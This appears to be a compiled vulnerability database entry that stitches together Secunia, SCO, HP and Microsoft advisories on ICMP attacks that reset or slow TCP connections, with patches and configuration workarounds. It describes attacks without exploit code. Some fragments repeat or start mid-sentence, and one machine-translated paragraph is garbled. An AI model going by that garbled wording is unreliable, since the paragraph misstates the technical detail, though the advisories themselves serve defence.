http://secunia.com/product/684/
Cisco PIX 6.x
http://secunia.com/product/56/
Cisco SAN-OS 1.x (MDS 9000 Switches)
http://secunia.com/product/3214/
DESCRIPTION:
Fernando Gont has published an Internet-Draft describing how ICMP
(Internet Control Message Protocol) can be exploited by malicious
people to cause a DoS (Denial of Service). Cisco has acknowledged
that various Cisco products are affected.
The published Internet-Draft details three types of attacks, which
utilize the following ICMP messages to cause a negative impact on TCP
connections either terminating or originating from a vulnerable
device.
SOLUTION:
See patch matrix in vendor advisory for information about fixes.
http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml#software
PROVIDED AND/OR DISCOVERED BY:
Fernando Gont
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml
NISCC:
http://www.niscc.gov.uk/niscc/docs/al-20050412-00308.html
ICMP attacks against TCP:
http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html
OTHER REFERENCES:
RFC1122 (Requirements for Internet Hosts -- Communication Layers):
http://www.ietf.org/rfc/rfc1122.txt
RFC1191 (Path MTU Discovery):
http://www.ietf.org/rfc/rfc1191.txt
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. The RFC recommends no security checking
for in-bound ICMP messages, so long as a related connection
exists, and may potentially allow several different Denials of
Service.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-0790 to this issue.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-0791 to this issue.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-1060 to this issue. Vulnerable Supported Versions
System Binaries
----------------------------------------------------------------------
OpenServer 5.0.6 ip and tcp drivers
OpenServer 5.0.7 ip and tcp drivers
3. Solution
The proper solution is to install the latest packages. OpenServer 5.0.6
4.1 Location of Fixed Binaries
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4
4.2 Verification
MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd
md5 is available for download from
ftp://ftp.sco.com/pub/security/tools
4.3 Installing Fixed Binaries
The following packages should be installed on your system before
you install this fix:
RS506A
OSS646
ERG711746: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3/SCOSA-2005.3.txt
ERG712606: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.9/SCOSA-2005.9.txt
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to a directory.
2) Run the custom command, specify an install from media images,
and specify the directory as the location of the images. OpenServer 5.0.7
5.1 Location of Fixed Binaries
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4
5.2 Verification
MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd
md5 is available for download from
ftp://ftp.sco.com/pub/security/tools
5.3 Installing Fixed Binaries
The following package should be installed on your system before
you install this fix:
OSR507MP4 - OpenServer 5, Release 5.0.7 Maintenance Pack 4
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to a directory.
2) Run the custom command, specify an install from media images,
and specify the directory as the location of the images. References
Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060
SCO security resources:
http://www.sco.com/support/security/index.html
SCO security advisories via email
http://www.sco.com/support/forums/security.html
This security fix closes SCO incidents sr892503 fz530662
erg712759. Disclaimer
SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products. Acknowledgments
The SCO Group would like to thank Fernando Gont for reporting
these issues.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. This fixes some
vulnerabilities, which can be exploited by malicious people to cause
a DoS (Denial of Service) on an active TCP session
VAR-200504-0002 | CVE-2004-0790 |
The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements
Related entries in the VARIoT exploits database: VAR-E-200504-0005, VAR-E-200504-0002, VAR-E-200504-0006, VAR-E-200404-0002 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the "blind connection-reset attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. In multiple vendor products TCP The implementation of ICMP Included in error message IP Address and TCP There is a flaw that only validates the port and does not check that the sequence number is in the proper range. This is illegal ICMP hard error By processing the message, TCP A vulnerability exists in which connections are reset. The vulnerability is ICMP Vulnerabilities resulting from message processing (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) Out of CVE-2004-0790 Vulnerability published as. TCP Due to vulnerabilities that affect implementation, a wide range of products are affected by these vulnerabilities. For more information, NISCC-532967 (JVN) , NISCC Advisory 532967/NISCC/ICMP (CPNI Advisory 00303) Please check also.Fraudulent ICMP By processing error messages TCP Connection is reset, resulting in service disruption (DoS) It can cause a condition. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.
ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.
Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.
The following individual attacks are reported:
- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.
A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.
- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
**Update: Microsoft platforms are also reported prone to these issues. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
HP SECURITY BULLETIN
HPSBUX01164 REVISION: 4
SSRT4884 rev.4 - HP-UX TCP/IP Remote Denial of Service (DoS)
NOTICE:
There are no restrictions for distribution of this Security
Bulletin provided that it remains complete and intact.
The information in this Security Bulletin should be acted upon
as soon as possible.
INITIAL RELEASE:
10 July 2005
POTENTIAL SECURITY IMPACT:
Remote Denial of Service (DoS)
SOURCE:
Hewlett-Packard Company
HP Software Security Response Team
VULNERABILITY SUMMARY:
A potential security vulnerability has been identified with HP-UX
running TCP/IP. This vulnerability could be remotely exploited by
an unauthorized user to cause a Denial of Service(DoS).
REFERENCES:
NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP.
HP-UX B.11.11 and B.11.23 running TOUR (Transport Optional Upgrade
Release).
BACKGROUND:
AFFECTED VERSIONS
HP-UX B.11.22
HP-UX B.11.00
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and either install binary
files or filter ICMP
HP-UX B.11.11
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and install PHNE_33159
HP-UX B.11.23
=============
Networking.NET2-KRN
->action: set ip_pmtu_strategy= 0 and install PHNE_32606
HP-UX B.11.11
HP-UX B.11.23
=============
TOUR_PRODUCT.T-NET2-KRN
action: set ip_pmtu_strategy= 0 and filter ICMP
HP-UX B.11.04
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and filter ICMP
END AFFECTED VERSIONS
Note: The latest TOUR (Transport Optional Upgrade Release),
version 2.4, is available on B.11.11 only. The latest
Transport Functionality is available to B.11.23 customers
in the HP-UX 11i v2 September 2004 release. Customers
using TOUR on B.11.23 can apply the workaround (set
ip_pmtu_strategy= 0 and filter ICMP) or upgrade to the
HP-UX 11i v2 September 2004 release. After upgrading the
action for B.11.23 Networking.NET2-KRN listed above should
be implemented.
<http://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html?
lang=en>
There are three issues reported in NISCC VU#532967:
CVE number: CAN-2004-0790
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790>
CVE number: CAN-2004-0791
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791>
CVE number: CAN-2004-1060
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060>
Workarounds are available for all three of these issues.
Until binary files are available for B.11.04 the workarounds
should be used.
->Binary files are available for CAN-2004-0790 and CAN-2004-0791
for HP-UX B.11.00 and B.11.22.
Since PHNE_33159 is now available for B.11.11 the preliminary
binary files for B.11.11 have been removed from the ftp site.
->Since PHNE_32606 is now available for B.11.23 the preliminary
binary files for B.11.23 have been removed from the ftp site.
Note: If the TOUR (Transport Optional Upgrade Release) product is
installed the binary files cannot be used.
Until the TOUR product is revised there are several options:
B.11.11
1. Use the workarounds.
or
2. Remove TOUR and install the binary files.
B.11.23
1. Use the workarounds.
or
2. Upgrade to the HP-UX 11i v2 September 2004 release
and install the binary files.
TOUR(Transport Optional Upgrade Release) is available from
<http://www.hp.com/go/softwaredepot>.
Workaround for CAN-2004-1060 may not be necessary.
===================================
Although changes in the binary files and patches for CAN-2004-0790
and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060,
they do make it less likely to succeed. The sequence number check
suggested in section 5.1 of <http://www.ietf.org/internet-drafts/
draft-gont-tcpm-icmp-attacks-03.txt> has been implemented.
Customers should consider whether this check reduces the risk of
the exploit to the point that setting ip_pmtu_strategy=0 is not
required.
If the workaround for CAN-2004-1060 is to be used, please note
the following:
=================================================
HPSBUX01137 recommends setting ip_pmtu_strategy = 0 or 3 as a
workaround for the problem of CAN-2005-1192. CAN-2004-1060 has a
different root cause and cannot be worked around with
p_pmtu_strategy=3. To work around both CAN-2005-1192 and
CAN-2004-1060 ip_pmtu_strategy=0 must be used.
Please refer to the Manual Actions section below for a summary of
the required actions.
Workarounds:
CAN-2004-0790 and CAN-2004-0791
Filter out the following ICMP messages:
Type 3, Code 2 (Destination Unreachable, Protocol Unreachable)
Type 3, Code 3 (Destination Unreachable, Port Unreachable)
Type 4, Code 0 (Source Quench)
CAN-2004-1060
Set ip_pmtu_strategy=0.
Note: Filtering "Protocol Unreachable" and "Port Unreachable"
should not be done without careful testing. Filtering these
out may interfere with the correct functioning of network
components.
Filtering "Source Quench" should present little risk.
Setting ip_pmtu_strategy=0
==================
Edit /etc/rc.config.d/nddconf to add the following:
TRANSPORT_NAME[n]=ip
NDD_NAME[n]=ip_pmtu_strategy
NDD_VALUE[n]=0
where 'n' is the next available index value as described in the
nddconf comments.
This value will take effect when the system is rebooted.
Until the system can be rebooted use the following command
to read the /etc/rc.config.d/nddconf file and set the tunable
parameters:
/usr/bin/ndd -c
The ip_pmtu_strategy parameter can be displayed by the
following command:
/usr/bin/ndd -get /dev/ip ip_pmtu_strategy
Note: Since open connections will remain potentially vulnerable
until they are closed and certain internal data structures
are released it is recommended that the system be rebooted.
Note: There is a defect that will cause "ndd -c" to fail if there
are more than 10 directives in /etc/rc.config.d/nddconf.
That defect is fixed in the following patches:
B.11.11 - PHNE_25644 or subsequent
B.11.04 - PHNE_26076 or subsequent
B.11.00 - PHNE_26125 or subsequent
Preliminary binary files
==============
->Preliminary binary files are available for B.11.00 and B.11.22.
Patches are available for B.11.11 and B.11.23. The patches and
the preliminary binary files address CAN-2004-0790 and
CAN-2004-0791 only. Although changes in the patches and binary
files for CAN-2004-0790 and CAN-2004-0791 do not prevent the
exploit of CAN-2004-1060, they do make it less likely to succeed.
Instructions for downloading and installing the binary files are
contained in readme files available here:
System: hprc.external.hp.com (192.170.19.51)
Login: icmp
Password: icmp
FTP Access:
ftp://icmp:icmp@hprc.external.hp.com/
or: ftp://icmp:icmp@192.170.19.51/
Note: The links above may not work for all browsers. If the
link fails the url should be entered directly into the
browser's address field.
Since a patch is available for B.11.11 the readme.11.11.txt and
corresponding binary files have been removed from the ftp site.
->Since a patch is available for B.11.23 the readme.11.23.txt and
corresponding binary files have been removed from the ftp site.
Download the appropriate readme file containing further
instructions:
readme.11.00.txt
readme.11.22.txt
Verify the cksum or md5sum:
->Note: The readme files have not changed since rev.1 of this
Security Bulletin.
cksum readme*
2844254744 2546 readme.11.00.txt
2836317466 2469 readme.11.22.txt
md5sum readme*
d28504f8532192de6a4f33bba4ea90ec readme.11.00.txt
cafbb24f3dc7131501142f75deaeccbd readme.11.22.txt
Download and install the binary files as discussed in the readme
files. The binary files are available in the same directory as
the readme files.
For B.11.11 download and install PHNE_33159. The patch is
available from < http://itrc.hp.com>.
->For B.11.23 download and install PHNE_32606. The patch is
available from < http://itrc.hp.com>.
MANUAL ACTIONS: Yes - NonUpdate
1. Set ip_pmtu_strategy=0
2. EITHER
a. Filter out the following ICMP messages:
Type 3, Code 2 (Destination Unreachable, Protocol Unreachable)
Type 3, Code 3 (Destination Unreachable, Port Unreachable)
Type 4, Code 0 (Source Quench)
OR
b. Install the appropriate binary file or patch (binary file
not available for B.11.04).
BULLETIN REVISION HISTORY:
Revision 0: 25 May 2005
Initial release
Revision 1: 1 June 2005
Binary files for B.11.00 and B.11.22 are available.
Added information about CAN-2004-1060.
The "set ip_pmtu_strategy=0" workaround is required even if
binary files are installed.
Removed IPSec information.
Revision 2: 19 June 2005
TOUR (Transport Optional Upgrade Release) on B.11.11 and B.11.23
is potentially vulnerable.
Added a description of the sequence number check implemented in
the binary files.
Revision 3: 27 June 2005
PHNE_33159 is available for B.11.11. The B.11.11 binary files
have been removed from the ftp site.
Revision 4: 10 July 2005
PHNE_32606 is available for B.11.23. The B.11.23 binary files
have been removed from the ftp site.
HP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision
B.02.00 analyzes all HP-issued Security Bulletins to provide a
subset of recommended actions that potentially affect a specific
HP-UX system.
For more information:
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/
displayProductInfo.pl?productNumber=B6834AA
SUPPORT: For further information, contact normal HP Services
support channel.
REPORT: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com. It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information. To obtain the security-alert PGP key please send an
e-mail message to security-alert@hp.com with the Subject of
'get key' (no quotes).
SUBSCRIBE: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&
langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your IRTC security bulletins and patches
- check ALL categories for which alerts are required and
continue.
Under Step2: your IRTC operating systems
- verify your operating system selections are checked and
save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page
Subscriber's choice for Business: sign-in.
On the Web page:
Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number:
GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault
System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."
(c)Copyright 2005 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of any kind. To the
extent permitted by law, neither HP nor its affiliates,
subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration.
The information in this document is subject to change without
notice. Hewlett-Packard Company and the names of Hewlett-Packard
products referenced herein are trademarks of Hewlett-Packard
Company in the United States and other countries. Other product
and company names mentioned herein may be trademarks of their
respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQtJVE+AfOvwtKn1ZEQKwPwCeLKNxE1048xGZniru4epJ6YAqYIcAn2+Y
fjKXZ3hbnTeQeIn9Kk9ePC1d
=cFE+
-----END PGP SIGNATURE-----
.
HP Tru64 UNIX 5.1B-3
HP Tru64 UNIX 5.1B-2/PK4
HP Tru64 UNIX 5.1A PK
HP Tru64 UNIX 4.0G PK4
HP Tru64 UNIX 4.0F PK8
BACKGROUND:
Special Instructions for the Customer
The Internet Control Message Protocol (ICMP) (RFC 792) is used in
the Internet Architecture to perform fault-isolation and recovery
(RFC816), which is the group of actions that hosts and routers
take to determine if a network failure has occurred.
The industry standard TCP specification (RFC 793) has a
vulnerability whereby ICMP packets can be used to perform a
variety of attacks such as blind connection reset attacks and
blind throughput-reduction attacks.
Path MTU Discovery (RFC 1191) describes a technique for
dynamically discovering the MTU (maximum transmission unit) of an
arbitrary internet path. This protocol uses ICMP packets from
the router to discover the MTU for a TCP connection path.
HP has addressed these potential vulnerabilities by providing a
new kernel tunable in Tru64 UNIX V5.1B and 5.1A,
icmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two
new kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. This behavior protects TCP
against spoofed ICMP packets.
Set the tunable as follows:
icmp_tcpseqcheck=1 (default)
Provides a level of protection that reduces the possibility
of considering a spoofed ICMP packet as valid
to one in two raised to the thirty-second power.
icmp_tcpseqcheck=0
Retains existing behavior, i.e., accepts all ICMP packets
icmp_rejectcodemask
In the Requirements for IP Version 4 Routers (RFC 1812), research
suggests that the use of ICMP Source Quench packets is an
ineffective (and unfair) antidote for congestion. Thus, HP
recommends completely ignoring ICMP Source Quench packets using
the icmp_rejectcodemask tunable. The icmp_rejectcodemask is a
bitmask that designates the ICMP codes that the system should
reject. For example, to reject ICMP Source Quench packets,
set the mask bit position for the ICMP_SOURCEQUENCH code 4,
which is two to the 4th power = 16 (0x10 hex).
The icmp_rejectcodemask tunable can be used to reject any
ICMP packet type, or multiple masks can be combined to reject
more than one type.
Note: the ICMP type codes are defined in
"/usr/include/netinet/ip_icmp.h".
Set the tunable as follows:
icmp_rejectcodemask = 0x10
Rejects ICMP Source Quench packets
icmp_rejectcodemask = 0 (default)
Retains existing behavior, i.e., accepts all ICMP packets
Adjusting the variables
The ICMP sequence check variable (icmp_tcpseqcheck) can be
adjusted using the sysconfig and sysconfigdb commands:
# sysconfig -q inet icmp_tcpseqcheck
inet:
icmp_tcpseqcheck = 1
# sysconfig -r inet icmp_tcpseqcheck=0
icmp_tcpseqcheck: reconfigured
# sysconfig -q inet icmp_tcpseqcheck
inet:
icmp_tcpseqcheck = 0
# sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge
# sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet
# sysconfigdb -l inet
inet:
icmp_tcpseqcheck = 1
Similarly, the icmp_rejectcodemask variable can be adjusted using
the sysconfig and sysconfigdb commands:
# sysconfig -q inet icmp_rejectcodemask
inet:
icmp_rejectcodemask = 0
# sysconfig -r inet icmp_rejectcodemask=0x10
icmp_rejectcodemask: reconfigured
# sysconfig -q inet icmp_rejectcodemask
inet:
icmp_rejectcodemask = 16
# sysconfig -q inet icmp_rejectcodemask
> /tmp/icmp_rejectcodemask_merge
# sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet
# sysconfigdb -l inet
inet:
icmp_rejectcodemask = 16
RESOLUTION:
Until the corrections are available in a mainstream
release patch kit, HP is releasing the following Early Release
Patch (ERP) kits publicly for use by any customer.
The ERP kits use dupatch to install and will not install over
any installed Customer Specific Patches (CSPs) that have file
intersections with the ERPs. Contact your service provider for
assistance if the ERP installation is blocked by any of your
installed CSPs.
The fixes contained in the ERP kits are scheduled to be
available in the following mainstream patch kits:
HP Tru64 Unix 5.1B-4
Early Release Patches
The ERPs deliver the following file:
/sys/BINARY/inet.mod
HP Tru64 UNIX 5.1B-3 ERP Kit Name:
T64KIT0025925-V51BB26-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025925-V51BB26-ES-20050628
MD5 checksum: 129251787a426320af16cd584b982027
HP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name:
T64KIT0025924-V51BB25-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025924-V51BB25-ES-20050628
MD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af
HP Tru64 UNIX 5.1A PK6 ERP Kit Name:
T64KIT0025922-V51AB24-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025922-V51AB24-ES-20050628
MD5 checksum: 7c373b35c95945651a1cfda96bf71421
HP Tru64 UNIX 4.0G PK4 ERP Kit Name:
T64KIT0025920-V40GB22-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025920-V40GB22-ES-20050628
MD5 checksum: 13849fd555239d75d300d1cb46dc995f
HP Tru64 UNIX 4.0F PK8 ERP Kit Name:
DUXKIT0025921-V40FB22-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025920-V40GB22-ES-20050628
MD5 checksum: 743b614d39f185802701b7f2dd14ffa5
MD5 checksums are available from the ITRC patch database main
page:
http://www.itrc.hp.com/service/patch/mainPage.do
- From the patch database main page, click Tru64 UNIX,
then click verifying MD5 checksums under useful links. The RFC recommends no security checking
for in-bound ICMP messages, so long as a related connection
exists, and may potentially allow several different Denials of
Service.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-0790 to this issue.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-0791 to this issue.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2004-1060 to this issue. Vulnerable Supported Versions
System Binaries
----------------------------------------------------------------------
OpenServer 5.0.6 ip and tcp drivers
OpenServer 5.0.7 ip and tcp drivers
3. Solution
The proper solution is to install the latest packages. OpenServer 5.0.6
4.1 Location of Fixed Binaries
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4
4.2 Verification
MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd
md5 is available for download from
ftp://ftp.sco.com/pub/security/tools
4.3 Installing Fixed Binaries
The following packages should be installed on your system before
you install this fix:
RS506A
OSS646
ERG711746: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3/SCOSA-2005.3.txt
ERG712606: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.9/SCOSA-2005.9.txt
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to a directory.
2) Run the custom command, specify an install from media images,
and specify the directory as the location of the images. OpenServer 5.0.7
5.1 Location of Fixed Binaries
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4
5.2 Verification
MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd
md5 is available for download from
ftp://ftp.sco.com/pub/security/tools
5.3 Installing Fixed Binaries
The following package should be installed on your system before
you install this fix:
OSR507MP4 - OpenServer 5, Release 5.0.7 Maintenance Pack 4
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to a directory.
2) Run the custom command, specify an install from media images,
and specify the directory as the location of the images. References
Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060
SCO security resources:
http://www.sco.com/support/security/index.html
SCO security advisories via email
http://www.sco.com/support/forums/security.html
This security fix closes SCO incidents sr892503 fz530662
erg712759. Disclaimer
SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products. Acknowledgments
The SCO Group would like to thank Fernando Gont for reporting
these issues.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
----------------------------------------------------------------------
Want to work within IT-Security?
Secunia is expanding its team of highly skilled security experts.
We will help with relocation and obtaining a work permit.
Currently the following type of positions are available:
http://secunia.com/hardcore_disassembler_and_reverse_engineer/
----------------------------------------------------------------------
TITLE:
Microsoft Windows Multiple IPv6 Denial of Service Vulnerabilities
SECUNIA ADVISORY ID:
SA22341
VERIFY ADVISORY:
http://secunia.com/advisories/22341/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
>From remote
OPERATING SYSTEM:
Microsoft Windows XP Professional
http://secunia.com/product/22/
Microsoft Windows XP Home Edition
http://secunia.com/product/16/
Microsoft Windows Server 2003 Web Edition
http://secunia.com/product/1176/
Microsoft Windows Server 2003 Standard Edition
http://secunia.com/product/1173/
Microsoft Windows Server 2003 Enterprise Edition
http://secunia.com/product/1174/
Microsoft Windows Server 2003 Datacenter Edition
http://secunia.com/product/1175/
DESCRIPTION:
Three vulnerabilities have been reported in Microsoft Windows, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
1) A vulnerability exists in the IPv6 Windows implementation of ICMP
which, if successfully exploited, results in the system dropping an
existing connection.
3) A vulnerability exists in the IPv6 implementation of TCP/IP which,
if successfully exploited, could cause the system to stop responding.
Successful exploitation of the vulnerabilities requires IPv6 to be
configured (not enabled by default).
Microsoft Windows XP SP1/SP2:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9fd73d12-ff7c-411d-944d-a6f147b20775
Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=fc98f55c-520e-4a68-a3c3-0df51c6122bb
Microsoft Windows Server 2003 (with or without SP1):
http://www.microsoft.com/downloads/details.aspx?FamilyId=102591a0-2b58-497b-bc20-593571b96e9c
Microsoft Windows Server 2003 (Itanium, with or without SP1):
http://www.microsoft.com/downloads/details.aspx?FamilyId=12515d47-134d-4d1f-9ae7-f0a7167ec424
Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=c5faba34-48f5-4875-a0fa-6b8207f9b276
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
MS06-064 (KB922819):
http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. This fixes some
vulnerabilities, which can be exploited by malicious people to cause
a DoS (Denial of Service) on an active TCP session
VAR-200412-1124 | CVE-2005-0068 |
The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements
Related entries in the VARIoT exploits database: VAR-E-200504-0005, VAR-E-200504-0002, VAR-E-200504-0006 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
